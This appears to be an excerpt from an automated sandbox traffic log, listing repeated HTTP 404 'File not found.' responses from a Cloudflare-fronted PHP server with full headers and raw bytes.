Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZg7pqIwQWYogcefF7suFUJbRwtaT4VDUCbQw0Ud1QD7fasbBfi4QlqueL6qUYBy77%2BQl4L%2B2TLEm8E0KtGcZjgjkQjN6VraKPMj1AxQkTMusTYES%2BbFudM0Dr8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dce91892c726b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUfdhFt641dgZrIOmohoB2RBPBfVu8q635RtBdRVEFe91BB9RDbFiLVnt40e9pCstT1t89A%2BklOGv3i8TPMiErE%2B9CUIZ1kXeRhXGBUOz5xCiXQgp%2FrEeWZ81rE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcea8187e32fc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4buGxQilCWmvTzmj0AoZbfL1Fqs%2BVhBGaNnyPzFHvRY%2FTpiGOc%2B00UrN5XhiQD%2FTD56dRea2YJ%2FPo7cNSxDgIT7ih8y53e78BYq5%2FBm7%2FQ4gKbCpjUtUUWBoYBo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dceadebe243fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lD3DgYZ%2Fsb2Nmd72hOXnTjUzPYeLNnHDO1qMXLzG%2BuZFecIep0F42RDeuyboPBMZV4dZAPokPUDfw8Mw8wVU39GgyqAQm3e%2BVciYsJgpi9YLAhU%2Bo2Vol6iG2u4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dceb3b8854398-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IxudLRa%2F74g9XxTREPYdFi%2FOH9znTx%2FAc%2FtXsWPNVhV7dHzu1mpy5OoGKDpgmP6LO%2FQ1%2B13qlq3Da2yrDTlIXE8Fs8dBkSw8kQDCESl%2BJDRMfx8AmNnSYymx4FA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dceb99e334396-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1755&rtt_var=877&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoqB8HoxWsjAaulfp3uWQNVXK2uOcvO0ncXWjPi8MS9g1XXy2e9wYIqPcij79RbbHIAdzA1GiDRjdr4qjPoThyxykvgVWznIwVgWcPbi9DCGChqlugxGknBDcDA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcecad864c338-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyhlrLUUMpLI5DbaDWsjmGO%2BjsKnLqKp3MUkd5HgH8qn5HmW4mDRAprT7FZNNitjgBZZZiYh2jY0fowYgeE68KIomezP63Q6DKyLVAWXVhU4ktjMp3Nf1fKVbi0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dced10be242d1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4303&min_rtt=4303&rtt_var=2151&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5nonAcwbC9UyGlcQsRsdd7FxS9OaD%2FpKxRChhnfGcuD7Zwz5d54MJJYXH14BH1CprTzdj04kX8i3p6pWuUJr5HINsNFwvKckhnmsevTVx3RIhzX34jY%2FDiJoyY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcedc7dbe7287-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1899&rtt_var=949&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuV%2BC0eoRlM665QIiXg1M7fpBFQnvByRzHA6qRtzyyJx%2BzZdt%2BtrdjqQ0Lo9CPeJyBWr4UxWRqYJpz0bdxHkYE6%2FUhUsoK87uraZh8E3BMerWWsJqHIjd5uuK3Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dceed6d31c3ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWH9lHn4aM4sIYyDnp70XuCShOx7fJrql%2FT%2BCQ%2FSp%2FJ8y9KWOlo%2F2a%2BPWYPWIKmYLJhfcn7kne5mPmA1PeAzGung%2Bgj4cms9gkIDyMY2rpTTPeBxUSYOVK7i%2BD4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcef33e98439a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2313&min_rtt=2313&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4i4u6RiOiCrCN1hHDYMSstGcJAhKA7mIP6M%2F%2FdlFNy0irhBUL5Pb86eob%2Ff8yl2dXPxrezqHJykyCUXUSblc5Gudld31eTEXViAVUPgygmH61nHgZxls0q16rw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcefdb8489e05-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pI4RV5MRXDSYw1RujhaGppyfkdCrYSLzFKik6ZrlkI8DvozZWB45RfkpaOUUAj1dMk06ZEdnfnPCreMdcw2GPKP8EQEY1ZLFxK0M4Ig0bCSQR4HGQriyMY1muw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf0378ba6a4e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73Rhfq6vT97COMokHdlDewiU3%2B1vl66Gr4soRMZFmgj0caOVHPymcbzUMw0WS9NdK5J8vUOoaCSbj32KNeWPTKo1dxRWITUDSa2FBL7aerXVGvaXYzorgbge9lE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf1d1c3f42f1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sc2zhjrziLSSgSDSmhf5EOpZu%2FaxloF4CPyk3xcSxqQ94pMtUqBxQxYWUia9KrO95jmXyE2mDqD%2FgBsqc1tSt4d76AL7JpNNcyBulVMVtAWiZNrPNeEi8667DwY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf2338ac4299-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GBCfjv7VgREng21oQNSi1ICpKx5qyk75t4fMszVwYrU5ufR33nUMyxYD1qKS5k%2Bp6lGQIpZJFygAl9x22tsYfi2kp9P3PE3mlQWWegOp15GQ7QwZhXXjC6gTSU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf292d830f60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3307&min_rtt=3307&rtt_var=1653&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2Zp7TqXJMa%2BswZxeqZHSlwLFOy1zoZMg9xe4dNUlihe%2B%2Bsl0LIa2GO%2FWWg90kDdGxc7fxJRouqMgL4npI4uyUVf%2BXAJ1sIZrBsEsK57E%2BDRnrI%2Fzm99uwK%2B2ig%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf34acc080dc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQAX5N5hTgMbtl1uuWM76MjOUw6MQ4nW8o7RBC9lvAVcFNw7GZQgA4ErTAeoo9N1P1hLPxw%2FWPTTxt9fVYwwWk8t8dqWC5YbSOYXQ9qtTds98GSdTzb5ymToGt4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf3a692cc32d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1447&rtt_var=723&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VpMA93zsLlYebb5Ht8pKX4ooWr85BiHEaAWEGV1gMBrJ36KZXxrLJcoGcfzgd8lktBmHqVWvXXe0sDAi3nNnaZjv5ItV0FPHNxE49%2BXFbMBHQ0NHQ2Jp19rVA5U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf45e8c44313-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2336&min_rtt=2336&rtt_var=1168&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KT%2FQTbqXIB9AF8UB6hylCB0BsVUHWdvLT6mV02yQ3hN1WEJnST52SMnhiW3oAbWsGEWR1f8hj0Izc%2B6VhU8ATR2NBccN6UUX2be0aV4nmVgHRSkwfwdv1sZHMQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf507ff57cf0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7bKmEKrwDgfi4VbXr6nsVhPBeeF%2BRkSrdRA6S5R8KpJA8smlKZGj8LAt4Nt7rJwmEDwDjdsaUfNlitSNSwAXG1qLEl0jJABJ2%2Bd0%2BoW1JCTpN2bX77nEFI2R1R4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf5cf8d6f5fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1416&min_rtt=1416&rtt_var=708&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DuZsn%2BUTcHPrZ98hZjKYH8xjRCUsmFuoLEH0oBcp4JLssZGFoBI4tYqjsWw9YdJ7%2BdVgrrTWQCDzbyqWwdM6fPt%2Fk2Z4R65URerE7z6DEvAniSy4o6a3XPJjsQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf64ddff42a5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=20781&min_rtt=20781&rtt_var=10390&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nU%2FpZZdMpsyR2jhFsJbsgSFIooo3ss85fy0FQ78m2GTkLCqOmulss8L%2BCJGrQHZR1PCvE1CtBMYDm8PXiTF69%2FJcryZpNgTJm5otRth3jnbQ%2F4Z%2FDeiABDp6LU4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf70dad94213-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqsU90AOHMWWU2VY72Z51D7wd%2FIgMb6gA5dSpFfsQapetzvBxXHQip7jsawuVWBUx5VEGp4T573qC%2FpOMKCuT8gq9wxUdNwWWXpUYXcTltRrwfyZ3QMpHzlOiss%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf8aac694367-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uOZvtjTWrn8g%2Bfl%2B9Bb9sF1yTxjQrZEGewbwE2r6VA4ybHU%2BPXPBYausUCPLq%2BpdhHTz%2F20Nw%2FVM2dhcsFZpAos%2FXtnqKe2MsiQljBQTeoyp41HnZHsc5ZMCiRQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf90aa0cefa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
